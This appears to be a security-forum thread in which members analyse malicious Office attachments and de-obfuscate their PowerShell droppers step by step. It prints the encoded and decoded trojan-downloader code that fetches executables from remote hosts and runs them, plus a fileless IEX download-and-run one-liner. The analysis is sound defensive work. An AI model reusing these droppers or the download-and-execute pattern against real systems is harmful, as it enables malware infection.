    $EncodedString='36!119R115<99c114%105@112%116U32@61R32R110R101U119U45c111A98!106:101R99U116U32F45F67F111R109R79<98A106<101<99@116F32U87%83R99@114c105F112c116%46!83%104c101c108F108%59A36U119!101c98A99F108c105c101!110c116<32@61F32<110@101<119%45R111%98U106%101F99:116U32R83%121@115!116:101U109<46A78R101:116F46c87A101:98R67%108<105:101R110A116<59<36R114@97c110@100!111%109<32R61:32!110U101c119!45c111@98%106%101!99!116:32%114F97R110%100c111U109U59U36:117@114@108R115A32@61<32:39R104R116@116%112U58@47F47R103:117!121R115R102R114c111A109%97:110%100!114F111c109U101U100%97:46R99:111!109A47@71@104R81A120A73<80@47R44R104R116!116%112U58F47%47R109c97<116c101R114:105%97<108U115:116A101A115c116@105!110R103A101F113<117%105@112%46A99R111<109@47A111R47:44A104%116:116F112F58R47<47%108!99@116@110c46@111c114%103%47%78U71R76A67%87c83<116%85F99<47@44:104@116R116F112@58<47<47!112!114<111@109@97<99U107:115R102@97U114!109<46@99:111F109<47c90<71R79F120@115@74<109@110R120%47c44U104%116F116:112<58%47!47@102F111<117R114A99:104@97A109:98F101R114R102<111@114F103<101!46F99F111R109!47c76@84%87R100!70A117:78<47@39<46U83:112R108F105<116@40!39U44F39U41<59U36R110@97%109c101<32!61!32:36:114A97U110@100c111F109@46F110A101<120!116R40@49%44A32U54%53!53!51R54c41:59%36F112!97R116U104:32!61c32:36U101U110!118R58c116<101R109<112:32@43%32c39%92<39%32@43R32R36c110%97@109c101@32A43@32!39R46:101U120@101F39%59F102R111@114<101:97:99F104@40R36@117%114!108<32<105A110<32R36<117:114c108A115R41F123<116A114%121F123F36R119R101A98@99A108@105R101U110!116<46R68!111F119!110c108U111c97%100:70R105R108:101:40U36U117@114c108%46R84<111A83A116@114c105A110:103%40U41@44:32@36c112:97R116F104%41R59F83U116!97U114:116U45F80:114A111!99F101@115U115A32U36:112c97<116%104<59<98U114:101<97!107%59c125%99R97c116@99%104F123%119:114R105A116!101<45U104R111:115U116F32%36@95c46%69<120:99c101@112F116R105%111:110:46@77:101A115%115:97!103R101F59:125!125'
    $obfuscatingCharacters = '@c:%!UR;A<F'
    -JoIn ($EncodedString.sPLIt($obfuscatingCharacters) | forEach { ( [iNT] $_-As [cHAR])})
    .
    De-obfuscated script commands:
    $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;
    $urls = 'http://aaaaa.com/GhQxIP/,http://bbb.../,http://eeeee.com/LTWdFuN/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}
    .
    The usual pattern.:)
     
    frogboy, lowdetection, XhenEd and 3 others like this.
  5. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,092
    4,677
    business
    Poland
    Windows 10
    Microsoft
    First example from Malware Samples 30/10/17 #13.
    .
    Payment enclosed.doc
    Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for 'Payment enclosed.doc'
    Code:
    $EncodedString='36W119W115k99B114-105-112U116B32B61k32U110k101B119R45R111G98-106%101R99G116%32p45G67%111W109T79%98p106T101U99T116k32B87G83U99B114%105T112U116U46R83k104R101T108T108U59U36U119%101G98-99B108W105T101U110-116U32W61W32k110R101T119T45%111B98-106W101R99p116U32-83%121U115W116-101G109G46k78U101T116B46B87U101T98p67W108-105T101k110T116W59W36R114U97k110k100R111T109G32p61G32U110T101R119G45G111k98k106U101%99-116-32-114-97G110R100p111W109k59B36%117U114T108U115G32G61-32B39-104%116k116U112B58p47U47%99W122G101G117U99-104G46-100W101R47U115p69R83U82-112k122k105R66k76U85B47T44%104U116U116-112U58U47W47B104k97k117B108U101R114p46R100W101-47%87B103W90k83B78-75k112T47%44k104U116W116W112k58k47U47%97G98T103R101R115k111p102G102W101B110k46U110-101W116U47p108-68R97-113W119p47R44B104B116%116%112%58k47p47p99U104W114k105p115p115k105p103p110R46-99B111%109W47%83%102-88k83-74W110p109k84W71R102k47W44-104G116p116%112-58U47W47p97p108T97W110%99W111R117R110T116R114p121%46B102W114U47%101R85B97%83k117U104k66%98-47-39R46R83B112k108k105G116-40R39B44G39%41R59-36p110R97U109%101G32%61R32B36T114W97-110T100%111B109-46G110-101U120R116R40p49R44-32R54p53%53W51T54B41G59p36W112U97k116k104W32R61W32T36%101G110R118-58p116B101p109k112R32T43T32B39T92T39G32U43B32B36k110p97k109k101R32W43R32%39U46R101W120-101W39-59W102G111W114p101R97U99T104G40U36T117R114k108U32B105B110G32p36%117W114W108-115k41-123G116p114p121k123k36-119B101-98T99-108R105W101-110-116T46W68-111U119k110k108k111B97U100B70U105%108k101%40-36B117k114B108p46T84U111T83W116B114W105W110%103k40k41U44p32B36p112k97-116R104G41T59%83B116B97%114G116k45B80-114W111U99B101-115%115W32T36%112B97G116-104k59T98W114p101%97p107G59k125k99B97B116B99%104T123B119U114k105-116p101U45%104G111W115-116U32R36G95R46B69k120G99p101p112-116U105k111-110U46T77-101W115p115T97R103-101p59k125p125'
    $obfuscatingCharacters = 'G%TUWR-kpB'
    -JoIn ($EncodedString.sPLIt($obfuscatingCharacters) | forEach { ( [iNT] $_ -As [cHAR])})
    .
    De-obfuscated PowerShell commands:
    $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;
    $urls = 'http://aaaaaaaa.de/sESRpziBLU/,http....com/SfXSJnmTGf/,http://eeeeeeee.fr/eUaSuhBb/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}
    .
    It looks like someone used a code copier.
     
  6. lowdetection

    lowdetection Level 5

    Jul 1, 2017
    209
    644
    China
    Linux
    Isolation
    @Andy Ful, this video that explain where to find fresh Malware Samples, also contain an example of what you explained up here, good work :)

     
  7. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,092
    4,677
    business
    Poland
    Windows 10
    Microsoft
    Second example from: Malware Samples 30/10/17 #13
    .
    ctravisi.xls
    Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for 'ctravisi.xls'
    Code:
    cMd /c"poweRSheLL -NoniNTeRaCtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen "do{sleep 33;(.(\"{2}{0}{1}\" -f'-o','bject','new') (\"{1}{3}{5}{0}{2}{4}\" -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('https://aaaaaaa.stream/modello','%temp%.exe')}while(!$?);&(\"{0}{2}{1}\"-f'star','ss','t-proce') '%temp%.exe'""
    .
    Let's lower/upper some letters (more readable code):
    Code:
    cmd /c"PowerShell -NonInteractive -NoPr -Executi Bypass -Windo Hidden "do{sleep 33;(.(\"{2}{0}{1}\" -f'-o','bject','new') (\"{1}{3}{5}{0}{2}{4}\" -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('https://aaaaaaa.stream/modello','%temp%.exe')}while(!$?);&(\"{0}{2}{1}\"-f'star','ss','t-proce') '%temp%.exe'""
    .
    De-obfuscation 1:
    \"{2}{0}{1}\" -f'-o','bject','new'
    The three strings: '-o','bject','new' (counted from 0) should be joined in the order {2}{0}{1}.
    So the string '-o' is related to {0}, the string 'bject' is related to {1} and the string 'new' is related to {2}.
    {2}{0}{1} means joining 'new' + '-o' + 'bject' = 'new-object'
    .
    De-obfuscation 2:
    Similarly the six strings 't','syst','.webclie','em','nt','.ne' (counted from 0) should be joined in the order {1}{3}{5}{0}{2}{4}:
    'syst' + 'em' + '.ne' + 't' + '.webclie' + 'nt' = 'system.net.webclient'
    .
    De-obfuscation 3:
    'd'+'ow'+'nloadfil'+'e' = 'downloadfile'
    .
    De-obfuscation 4:
    Three strings 'star','ss','t-proce' (counted from 0) should be joined in the order {0}{2}{1}:
    'star' + 't-proce' + 'ss' = 'start-process'
    .
    De-obfuscation 5:
    -NoPr --> -NoProfile
    -Executi --> -ExecutionPolicy
    -Windo --> -WindowStyle
    .
    De-obfuscated code (added some spaces):
    Code:
    cmd /c "PowerShell -NonInteractive -NoProfile -ExecutionPolicy Bypass -WindowStyle hidden "do{sleep 33;(new-object system.net.webclient).downloadfile.Invoke('https://aaaaaaa.stream/modello','%temp%.exe')}while(!$?);&start-process '%temp%.exe'""
    Nothing new (trojan downloader).
     
  8. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,092
    4,677
    business
    Poland
    Windows 10
    Microsoft
    #8 Andy Ful, Nov 3, 2017
    Last edited: Nov 3, 2017
    First example from Malware Samples 3-11-17 #13.
    001_4910.doc
    Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for '001_4910.doc'
    Code:
    powershell.exe -nop -noexit -c "$sr = (new-object System.IO.StreamReader((([System.Net.WebRequest]::Create('https://aaaaa/Jmdnaf36dd')).GetResponse()).GetResponseStream())).ReadToEnd();IEX $sr;"
    
    .
    This example is not obfuscated, but it is interesting because of not using the command 'new-object system.net.webclient'. Instead of this there are used 'new-object System.IO.StreamReader' and 'System.Net.WebRequest', to read the file 'Jmdnaf36dd' from the remote website. Next, this file is executed from the memory (filelessly).
    If someone wants to see how it would work with the script Helloworld.ps1 from my GitHub website, then copy the below code, paste to Explorer and run like any other command:
    Code:
    powershell.exe -nop -noexit -c "$sr=(new-object System.IO.StreamReader((([System.Net.WebRequest]::Create('https://raw.githubusercontent.com/AndyFul/Hard_Configurator---old-versions/master/Helloworld.ps1')).GetResponse()).GetResponseStream())).ReadToEnd();IEX $sr;"
    .
    The PowerShell console should open with 'Hello World!'. :)
     
  9. boredog

    boredog Level 8

    Jul 5, 2016
    392
    818
    Retired
    usa
    Windows 10
    Malwarebytes
    Wierd, I went to register at rever.it and it gives me a error saying someone this this email is allready registered and I have never even been to that site before.
     
  10. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,092
    4,677
    business
    Poland
    Windows 10
    Microsoft
    Second example from: Malware Samples 3-11-17 #13.
    ZGK#SLRP (03 Nov 17).doc (6RS34PRb on hybrid-analysis.com)
    Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for '6RS34PRb'
    Code:
    $EncodedString='36O119_115S99~114O105u112~116D32S61D32m110m101m119S45;111D98D106D101S99u116u32S45I67~111m109{79m98u106O101_99{116~32I87u83u99{114D105~112S116u46{83S104O101_108u108D59D36I119~101m98m99O108m105{101_110{116O32I61_32{110~101I119~45S111_98I106~101O99_116I32_83~121~115S116_101~109S46_78{101m116S46~87D101D98{67I108m105S101;110I116m59D36;114_97m110;100{111~109;32S61I32S110I101O119D45I111m98O106S101u99u116S32O114{97u110~100S111S109m59_36{117;114D108m115D32S61m32S39I104_116;116{112u58S47S47u112{104O101O108{101I112{46;99m111~109m47_84;86D111I116O75m107O47_44u104_116~116{112{58{47{47~118I101D108I111~107;117S114m105u101m114m46m110O101u116_47O119_103D101m104D75_86m47_44O104S116_116D112O58D47m47O102~105S99O102u97D99~46m100~101I47D85m73~78_120u81D47D44I104m116~116m112_58I47I47D111{114D100_111;45u116m101u109u112;108u105S45~97S114_99m97~110_117m109{46u100I101I47O67S68D115S119{47m44~104u116S116S112u58I47{47_97m115;99I111D45m116u101O97{109{46m100_101S47~67O110;79;98_86~67u74O47_39S46~83O112~108O105{116{40D39~44{39I41S59m36_110u97~109m101m32D61~32I36D114I97{110m100u111~109_46u110{101u120_116m40~49_44{32{54;53{53~51~54I41m59S36m112u97u116m104{32I61m32{36~101m110D118u58m116u101O109I112D32~43{32m39_92~39{32D43~32I36S110~97D109u101S32{43{32u39;46O101~120O101;39I59m102~111O114D101m97u99~104D40I36{117_114S108m32u105u110I32~36_117u114{108I115_41~123u116S114;121I123I36S119m101~98D99I108S105~101S110;116S46~68_111O119I110m108u111S97S100I70~105~108S101~40~36;117O114{108;46D84I111u83;116O114O105{110S103{40m41D44I32I36S112D97;116;104S41D59_83O116m97{114D116O45O80~114I111~99I101m115I115;32D36{112D97I116S104{59{98m114u101;97m107S59D125m99u97~116I99m104S123{119;114u105u116_101m45O104{111D115~116O32O36u95O46~69_120D99m101m112~116m105S111u110O46S77I101{115~115m97D103m101I59;125m125'
    $obfuscatingCharacters = '{D_O-SI;mu~'
    -JoIn ($EncodedString.sPLIt($obfuscatingCharacters) | forEach { ( [iNT] $_ -As [cHAR])})
    .
    De-obfuscated PowerShell commands:
    $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://aaaaa/TVotKk/,http://bbbbb/w...NxQ/,http://ddddd/CDsw/,http://eeeee/CnObVCJ/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}
    .
    Another example of 'new-object System.Net.WebClient' command.:)
     
    silversurfer and harlan4096 like this.
  11. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,092
    4,677
    business
    Poland
    Windows 10
    Microsoft
    #11 Andy Ful, Nov 3, 2017
    Last edited: Nov 3, 2017
    I do not know what website you had in mind. :) Youtube or the website with malware samples?
    Edit.
    It could happen when the website had changed its name (you registered on the old website), the second alternative is not good to you.
     
  12. boredog

    boredog Level 8

    Jul 5, 2016
    392
    818
    Retired
    usa
    Windows 10
    Malwarebytes
    I meant to type Free Automated Malware Analysis Service - powered by VxStream Sandbox

    Not sure what the old site was. Only one I download malware from now is testmyav.
     
    Andy Ful likes this.
  13. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,092
    4,677
    business
    Poland
    Windows 10
    Microsoft
    lowdetection likes this.
  14. lowdetection

    lowdetection Level 5

    Jul 1, 2017
    209
    644
    China
    Linux
    Isolation
    #14 lowdetection, Nov 3, 2017
    Last edited: Nov 3, 2017
  15. upnorth

    upnorth Level 11

    Jul 27, 2015
    520
    2,759
    Sweden
  16. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,092
    4,677
    business
    Poland
    Windows 10
    Microsoft
    #16 Andy Ful, Nov 11, 2017
    Last edited: Nov 16, 2017
    The example from Malware Samples 10/11/17 #12
    New-invoice-8608859.doc (Invoice-number-943048.doc on hybrid-analysis.com)
    Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for 'Invoice-number-943048'
    .
    The example is interesting, because the PowerShell code is doubly obfuscated (the obfuscation code is also obfuscated), in the pattern:
    .
    (MainObfuscatedCode.(Obfuscated De-Obfuscation Commands2)).(De-Obfuscation Commands1) | (execute)
    .
    The PowerShell commands can be found in the 'Extracted Strings' section of hybrid-analysis:
    "powershell "(' & ( 0hCENV:COMSPEc[4,26,25]-JoinwVIwVI)((wVI & ( NnopshOme[21]+NnoPsHOMe[30'+']+
    wVI+wVIe'+'clXewVI+wVIcl)wVI+wVI ( (eclFk1fra'+'nc wVI+wVI= new-objecl+eclect ecl+eclSysteec'+'l+
    eclm.ewVI+wVIcl+eclNeecl+eclt.WebClie'+'ecl+eclnt;ecl+eclFecl+eclk1nsadasd = ecl+eclneecl+
    eclw-ecl+eclobe'+'cl+ecljeecl+eclct ecl+eclrandwVI+wVIom;Fk1becl+eclcecl+ecldecl+ecl = Iecl+
    wVI+wVIeclophttecl+eclp:ecl+ecl//xnec'+'l+e'+'cl'+'--ecl+ecl80a'+'ecl+eclhecl+eclk9'+'a.xnwVI+
    wVIecl+ecl-ecl+ecl-p1aiecl+e'+'cl/gPhwVI+wVITZQJ/,ecl+eclhttp:/ecl+e'+'cl/beniecl+ecltecl+ecl.ecl
    +wVI+wVIeclbiz/eecl+eclsecl+ecluBzzmU/,ecl+eclhtecl+ecltp:ecl+ecl/ecl'+'+ecl'+'/recl+eclemecl+
    ecloecwVI+wVIl+eclnec'+'l+eclt-britv.ruecl'+'+ecl/Uecl+e'+'cla'+'muecl+eclKMpu'+'ecl+'+'ecl/,ewVI+
    wV'+'Icl+ecwVI+wVIlh'+'ttp'+'ecl+ecl://recl+wVI+wVIeclemecl+ecloecl+eclntecl+e'+'cl-secl+
    eclhlangov.ru/Q/,htecl+e'+'cltp://www.ecl+eclledpuecl+eclblicecl+eclidecl+eclad.com/jtvsecl+
    eclZO/Iopecl+ecl.ecl+eclSpliecl+eclwVI+wVIt(ecl+eclIecl+eclop,Ioecl+eclp);'+'ecl+eclFk1ecl+
    eclkarapaecl+eclwVI+wVIsecl+ecl = Fecl+eclk1ecl+eclnsadasecl+ecld.next'+'(ecl+ecl1, 343245);
    Fecl+eclkecl+ecl1ecl+eclhuas = Fk1eecl+wVI+wVI'+'eclnv;puecl+eclblic + ecl+eclIecl'+'+eclopaecl+
    eclbOIopecl+ecl '+'ecl+e'+'cl+ ecl+eclFkecl+ecl1kar'+'apasecl+ecl +ecl+ecl Iecl+ecloecl+eclp.ecl+
    ecl'+'exeIop;fwVI+wVIoreach(Fkecl+ecl1'+'ec'+'l+eclaecl+eclbc ecl+eclinecl+ecl F'+'ecl+eclk1b'+'cd)'+
    '{t'+'ryecl+ecl{ecl+eclFk1ecl+eclfrancecl+ecl.Decl'+'+eclownecl+eclloawVI+wVIdecl+
    eclFile(Fk1abc.ToSecl+ecltring(), FkewVI+wVIcl+e'+'cl1huas);Invokecl+eclewVI+wVI-Iec'+'l+
    ecltem(Fk1ecl+ecl'+'huas)ecl+ecl;becl+eclreecl+eclak;}cecl+eclatch{write-host ecl'+'+eclFk1_.'+'
    Exceecl+eclpecl+eclwVI+wVItion.MessagewVI+wVI;}}ecl)
    .R'+'EpLacE((w'+'VI+wVI['+'cHa'+'r]97+[cHar]98+'+'[cHar]79)wVI+wVI,eclJV'+'Lecl).RwVI+
    wVIEpLacE(eclFk1ecl,[String][cHar]36).REpLacE(wVI+wVI([cHar]73+[cHar]111+[cHar]wVI+wVI1'+'
    1wVI+wVI2),[Strin'+'wVI+wVIg][c'+'Har]39)'+' )'+' wVI).rEPlaCe(([ChaR]78+[ChaR]110+
    [ChaR]111),[sTring][ChaR]36).rEPlaCe(([ChaR]101+[ChaR]99+[ChaR]108),[sTring][ChaR]39)
    .rEP'+'laCe(wVIJVLwVI,wVIz1awVI))').RePlAcE(([CHar]119+[CHar]86+[CHar]73),[STRiNG][CHar]39)
    .RePlAcE(([CHar]122+[CHar]49+[CHar]97),'\').RePlAcE(([CHar]48+[CHar]104+[CHar]67),'$')
    |. ( $env;pUbLic[13]+$env;puBlIc[5]+'X')
    .
    The last line is an obfuscated IEX command (Invoke-Expression cmdlet). We do not want to execute the code, so the last line:
    |. ( $env;pUbLic[13]+$env;puBlIc[5]+'X')
    have to be thrown out.
    The code is a mess, so the best way is using the slightly modified code to de-obfuscate itself.
    .
    The last three REPLACE commands contain de-obfuscation commands, but first, we have to convert Ascii characters and join them:
    .
    De-Obfuscation Commands1 --> RePlAcE(([CHar]119+[CHar]86+[CHar]73),[STRiNG][CHar]39).RePlAcE(([CHar]122+[CHar]49+[CHar]97),'\').RePlAcE(([CHar]48+[CHar]104+[CHar]67),'$')
    We obtain:
    De-Obfuscation Commands1 --> RePlAcE('wVI',"'").RePlAcE('z1a','\').RePlAcE('0hC','$')
    .
    The rest of the code we put into a string, and omit the "'+'" (joining):
    Code:
    $Obfuscated =
    ' & ( 0hCENV:COMSPEc[4,26,25]-JoinwVIwVI)((wVI & ( NnopshOme[21]+NnoPsHOMe[30]+
    wVI+wVIeclXewVI+wVIcl)wVI+wVI ( (eclFk1franc wVI+wVI= new-objecl+eclect ecl+eclSysteecl+
    eclm.ewVI+wVIcl+eclNeecl+eclt.WebClieecl+eclnt;ecl+eclFecl+eclk1nsadasd = ecl+eclneecl+
    eclw-ecl+eclobecl+ecljeecl+eclct ecl+eclrandwVI+wVIom;Fk1becl+eclcecl+ecldecl+ecl = Iecl+
    wVI+wVIeclophttecl+eclp:ecl+ecl//xnecl+ecl--ecl+ecl80aecl+eclhecl+eclk9a.xnwVI+
    wVIecl+ecl-ecl+ecl-p1aiecl+ecl/gPhwVI+wVITZQJ/,ecl+eclhttp:/ecl+ecl/beniecl+ecltecl+ecl.ecl
    +wVI+wVIeclbiz/eecl+eclsecl+ecluBzzmU/,ecl+eclhtecl+ecltp:ecl+ecl/ecl+ecl/recl+eclemecl+
    ecloecwVI+wVIl+eclnecl+eclt-britv.ruecl+ecl/Uecl+eclamuecl+eclKMpuecl+ecl/,ewVI+
    wVIcl+ecwVI+wVIlhttpecl+ecl://recl+wVI+wVIeclemecl+ecloecl+eclntecl+ecl-secl+
    eclhlangov.ru/Q/,htecl+ecltp://www.ecl+eclledpuecl+eclblicecl+eclidecl+eclad.com/jtvsecl+
    eclZO/Iopecl+ecl.ecl+eclSpliecl+eclwVI+wVIt(ecl+eclIecl+eclop,Ioecl+eclp);ecl+eclFk1ecl+
    eclkarapaecl+eclwVI+wVIsecl+ecl = Fecl+eclk1ecl+eclnsadasecl+ecld.next(ecl+ecl1, 343245);
    Fecl+eclkecl+ecl1ecl+eclhuas = Fk1eecl+wVI+wVIeclnv:puecl+eclblic + ecl+eclIecl+eclopaecl+
    eclbOIopecl+ecl ecl+ecl+ ecl+eclFkecl+ecl1karapasecl+ecl +ecl+ecl Iecl+ecloecl+eclp.ecl+
    eclexeIop;fwVI+wVIoreach(Fkecl+ecl1ecl+eclaecl+eclbc ecl+eclinecl+ecl Fecl+eclk1bcd)'+
    '{tryecl+ecl{ecl+eclFk1ecl+eclfrancecl+ecl.Decl+eclownecl+eclloawVI+wVIdecl+
    eclFile(Fk1abc.ToSecl+ecltring(), FkewVI+wVIcl+ecl1huas);Invokecl+eclewVI+wVI-Iecl+
    ecltem(Fk1ecl+eclhuas)ecl+ecl;becl+eclreecl+eclak;}cecl+eclatch{write-host ecl+eclFk1_.
    Exceecl+eclpecl+eclwVI+wVItion.MessagewVI+wVI;}}ecl)
    .REpLacE((wVI+wVI[cHar]97+[cHar]98+[cHar]79)wVI+wVI,eclJVLecl).RwVI+
    wVIEpLacE(eclFk1ecl,[String][cHar]36).REpLacE(wVI+wVI([cHar]73+[cHar]111+[cHar]wVI+wVI1
    1wVI+wVI2),[StrinwVI+wVIg][cHar]39) ) wVI).rEPlaCe(([ChaR]78+[ChaR]110+
    [ChaR]111),[sTring][ChaR]36).rEPlaCe(([ChaR]101+[ChaR]99+[ChaR]108),[sTring][ChaR]39)
    .rEPlaCe(wVIJVLwVI,wVIz1awVI))'
    .
    Next, we execute in PowerShell:
    Code:
    $Obfuscated.RePlAcE('wVI',"'").RePlAcE('z1a','\').RePlAcE('0hC','$')
    .
    The result:
    & ( $ENV:COMSPEc[4,26,25]-Join'')((' & ( NnopshOme[21]+NnoPsHOMe[30]+
    '+'eclXe'+'cl)'+' ( (eclFk1franc '+'= new-objecl+eclect ecl+eclSysteecl+
    eclm.e'+'cl+eclNeecl+eclt.WebClieecl+eclnt;ecl+eclFecl+eclk1nsadasd = ecl+eclneecl+
    eclw-ecl+eclobecl+ecljeecl+eclct ecl+eclrand'+'om;Fk1becl+eclcecl+ecldecl+ecl = Iecl+
    '+'eclophttecl+eclp:ecl+ecl//xnecl+ecl--ecl+ecl80aecl+eclhecl+eclk9a.xn'+
    'ecl+ecl-ecl+ecl-p1aiecl+ecl/gPh'+'TZQJ/,ecl+eclhttp:/ecl+ecl/beniecl+ecltecl+ecl.ecl
    +'+'eclbiz/eecl+eclsecl+ecluBzzmU/,ecl+eclhtecl+ecltp:ecl+ecl/ecl+ecl/recl+eclemecl+
    ecloec'+'l+eclnecl+eclt-britv.ruecl+ecl/Uecl+eclamuecl+eclKMpuecl+ecl/,e'+
    'cl+ec'+'lhttpecl+ecl://recl+'+'eclemecl+ecloecl+eclntecl+ecl-secl+
    eclhlangov.ru/Q/,htecl+ecltp://www.ecl+eclledpuecl+eclblicecl+eclidecl+eclad.com/jtvsecl+
    eclZO/Iopecl+ecl.ecl+eclSpliecl+ecl'+'t(ecl+eclIecl+eclop,Ioecl+eclp);ecl+eclFk1ecl+
    eclkarapaecl+ecl'+'secl+ecl = Fecl+eclk1ecl+eclnsadasecl+ecld.next(ecl+ecl1, 343245);
    Fecl+eclkecl+ecl1ecl+eclhuas = Fk1eecl+'+'eclnv;puecl+eclblic + ecl+eclIecl+eclopaecl+
    eclbOIopecl+ecl ecl+ecl+ ecl+eclFkecl+ecl1karapasecl+ecl +ecl+ecl Iecl+ecloecl+eclp.ecl+
    eclexeIop;f'+'oreach(Fkecl+ecl1ecl+eclaecl+eclbc ecl+eclinecl+ecl Fecl+eclk1bcd){tryecl+ecl{ecl+eclFk1ecl+eclfrancecl+ecl.Decl+eclownecl+eclloa'+'decl+
    eclFile(Fk1abc.ToSecl+ecltring(), Fke'+'cl+ecl1huas);Invokecl+ecle'+'-Iecl+
    ecltem(Fk1ecl+eclhuas)ecl+ecl;becl+eclreecl+eclak;}cecl+eclatch{write-host ecl+eclFk1_.
    Exceecl+eclpecl+ecl'+'tion.Message'+';}}ecl)
    .REpLacE(('+'[cHar]97+[cHar]98+[cHar]79)'+',eclJVLecl).R'+
    'EpLacE
    (eclFk1ecl,[String][cHar]36).REpLacE('+'([cHar]73+[cHar]111+[cHar]'+'1
    1'+'2),[Strin'+'g][cHar]39) ) ').rEPlaCe(([ChaR]78+[ChaR]110+
    [ChaR]111),[sTring][ChaR]36).rEPlaCe(([ChaR]101+[ChaR]99+[ChaR]108),[sTring][ChaR]39)
    .rEPlaCe('JVL','\'))
    .
    Now, the six REPLACE commands at the end of the above code contain partially de-obfuscated code, so the procedure should be repeated.
    .
    De-Obfuscation Commands2 --> REpLacE(('+'[cHar]97+[cHar]98+[cHar]79)'+',eclJVLecl).R'+
    'EpLacE(eclFk1ecl,[String][cHar]36).REpLacE('+'([cHar]73+[cHar]111+[cHar]'+'1
    1'+'2),[Strin'+'g][cHar]39) ) ').rEPlaCe(([ChaR]78+[ChaR]110+
    [ChaR]111),[sTring][ChaR]36).rEPlaCe(([ChaR]101+[ChaR]99+[ChaR]108),[sTring][ChaR]39)
    .rEPlaCe('JVL','\'))
    .
    Convert ASCII characters and join them:
    De-Obfuscation Commands2 -->
    REpLacE('abO','JVL').REpLacE('Fk1','$').REpLacE('Iop',"'").rEPlaCe('Nno','$').rEPlaCe('ecl',"'").rEPlaCe('JVL','\')
    .
    We can also omit the first command in the main code:
    .
    $ENV:COMSPEc[4,26,25]-Join
    .
    because it is used to join the code, that we will do manually.
    .
    Join the code (omit the "'+'"), and execute in PowerShell:
    Code:
    $MainObfuscatedCode = ' & ( NnopshOme[21]+NnoPsHOMe[30]+
    eclXecl) ( (eclFk1franc = new-objecl+eclect ecl+eclSysteecl+
    eclm.ecl+eclNeecl+eclt.WebClieecl+eclnt;ecl+eclFecl+eclk1nsadasd = ecl+eclneecl+
    eclw-ecl+eclobecl+ecljeecl+eclct ecl+eclrandom;Fk1becl+eclcecl+ecldecl+ecl = Iecl+
    eclophttecl+eclp:ecl+ecl//xnecl+ecl--ecl+ecl80aecl+eclhecl+eclk9a.xn'+
    'ecl+ecl-ecl+ecl-p1aiecl+ecl/gPhTZQJ/,ecl+eclhttp:/ecl+ecl/beniecl+ecltecl+ecl.ecl+
    eclbiz/eecl+eclsecl+ecluBzzmU/,ecl+eclhtecl+ecltp:ecl+ecl/ecl+ecl/recl+eclemecl+
    ecloecl+eclnecl+eclt-britv.ruecl+ecl/Uecl+eclamuecl+eclKMpuecl+ecl/,ecl+eclhttpecl+
    ecl://recl+eclemecl+ecloecl+eclntecl+ecl-secl+eclhlangov.ru/Q/,htecl+ecltp://www.ecl+
    eclledpuecl+eclblicecl+eclidecl+eclad.com/jtvsecl+eclZO/Iopecl+ecl.ecl+eclSpliecl+
    eclt(ecl+eclIecl+eclop,Ioecl+eclp);ecl+eclFk1ecl+eclkarapaecl+eclsecl+ecl = Fecl+
    eclk1ecl+eclnsadasecl+ecld.next(ecl+ecl1, 343245);Fecl+eclkecl+ecl1ecl+
    eclhuas = Fk1eecl+eclnv:puecl+eclblic + ecl+eclIecl+eclopaecl+eclbOIopecl+ecl ecl+
    ecl+ ecl+eclFkecl+ecl1karapasecl+ecl +ecl+ecl Iecl+ecloecl+eclp.ecl+
    eclexeIop;foreach(Fkecl+ecl1ecl+eclaecl+eclbc ecl+eclinecl+ecl Fecl+eclk1bcd){tryecl+
    ecl{ecl+eclFk1ecl+eclfrancecl+ecl.Decl+eclownecl+eclloadecl+
    eclFile(Fk1abc.ToSecl+ecltring(), Fkecl+ecl1huas);Invokecl+ecle-Iecl+
    ecltem(Fk1ecl+eclhuas)ecl+ecl;becl+eclreecl+eclak;}cecl+
    eclatch{write-host ecl+eclFk1_.Exceecl+eclpecl+ecltion.Message;}}ecl)'
    
    $MainObfuscatedCode.REpLacE('abO','JVL').REpLacE('Fk1','$').REpLacE('Iop',"'").rEPlaCe('Nno','$').rEPlaCe('ecl',"'").rEPlaCe('JVL','\')
    
    .
    The result:
    & ( $pshOme[21]+$PsHOMe[30]+
    'X') ( ('$franc = new-obj'+'ect '+'Syste'+
    'm.'+'Ne'+'t.WebClie'+'nt;'+'F'+'k1nsadasd = '+'ne'+
    'w-'+'ob'+'je'+'ct '+'random;$b'+'c'+'d'+' = I'+
    'ophtt'+'p:'+'//xn'+'--'+'80a'+'h'+'k9a.xn'+'-'+'-p1ai'+'/gPhTZQJ/,'+'http:/'+'/beni'+'t'+'.'+
    'biz/e'+'s'+'uBzzmU/,'+'ht'+'tp:'+'/'+'/r'+'em'+
    'o'+'n'+'t-britv.ru'+'/U'+'amu'+'KMpu'+'/,'+'http'+
